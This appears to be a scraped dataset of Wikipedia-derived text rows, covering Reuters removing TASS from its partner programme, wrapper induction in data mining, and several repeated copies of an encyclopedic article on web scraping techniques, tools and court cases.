Reuters announced that Russian news agency TASS had joined its "Reuters Connect" programme, comprising a then-total of 18 partner agencies. Reuters president Michael Friedenberg said he was "delighted that TASS and Reuters are building upon our valued partnership". 70 Two years later, TASS's membership in Reuters Connect came under scrutiny in the wake of the 2022 Russian invasion of Ukraine; Politico reported that Reuters staff members were "frustrated and embarrassed" that their agency had not suspended its partnership with TASS. 71 On 23 March 2022, Reuters removed TASS from its "content marketplace". Matthew Keen, interim CEO of Reuters said "we believe making TASS content available on Reuters Connect is not aligned with the Thomson Reuters Trust Principles". 72 1 2 3 4 5 6 7 NBC News Wall Street Journal Politico MSNBC CNBC Telemundo Bloomberg Industry Group Washington Examiner Boston Globe Washington Blade Fox News CBS News Radio AP Radio PBS VOA Time Yahoo News Daily Caller EWTN CBS News Bloomberg News McClatchy NY Post TheGrio Washington Times Salem Radio CBN Cheddar News Hearst TV AP NPR Foreign pool The Hill Regionals Newsmax Gray TV Spectrum News ABC News Washington Post Agence France-Presse Fox Business Fox News Radio CSM Roll Call Al JazeeraNexstar Scripps News Reuters NY Times LA Times Univision AURN RealClearPolitics Daily Beast Dallas Morning News BBC Newsweek CNN USA Today ABC News RadioDaily Mail National JournalHuffPostFinancial Times The Guardian |
2 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wrapper_(data_mining) | Wrapper in data mining is a procedure that extracts regular subcontent of an unstructured or loosely-structured information source and translates it into a relational form, so it can be processed as structured data. 1 Wrapper induction is the problem of devising extraction procedures on an automatic basis, with minimal reliance on hand-crafted rules. Many web pages are automatically generated from structured data telephone directories, product catalogs, etc. wrapped in a loosely structured presentation language (usually some variant of HTML), formatted for human browsing and navigation. Structured data are typically descriptions of objects retrieved from underlying databases and displayed in web pages following fixed templates at a low level, injected into pages where the high-level structure can vary from week to week, per the rapidly evolving fashion of the site's presentation skin. The precise dividing line between the fluid high-level skin and the less fluid structured data templates is rarely documented for public consumption, outside of the content management team at the web property. Software systems using such resources must translate HTML content into a relational form. Wrappers are commonly used as such translators. Formally, a wrapper is a function from a page to the set of tuples it contains. There are two main approaches to wrapper generation: wrapper induction and automated data extraction. Wrapper induction uses supervised learning to learn data extraction rules from manually labeled training examples. The disadvantages of wrapper induction are Due to the manual labeling effort, it is hard to extract data from a large number of sites as each site has its own templates and requires separate manual labeling for wrapper learning. Wrapper maintenance is also a major issue because whenever a site changes the wrappers built for the site become obsolete. Due to these shortcomings, researchers have studied automated wrapper generation using unsupervised pattern mining. Automated extraction is possible because most Web data objects follow fixed templates. Discovering such templates or patterns enables the system to perform extraction automatically. 2 Wrapper generation on the Web is an important problem with a wide range of applications. Extraction of such data enables one to integrate data information from multiple Web sites to provide value-added services, e.g., comparative shopping, object search, and information integration. |
3 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#See_also | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
4 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-21 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
5 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. 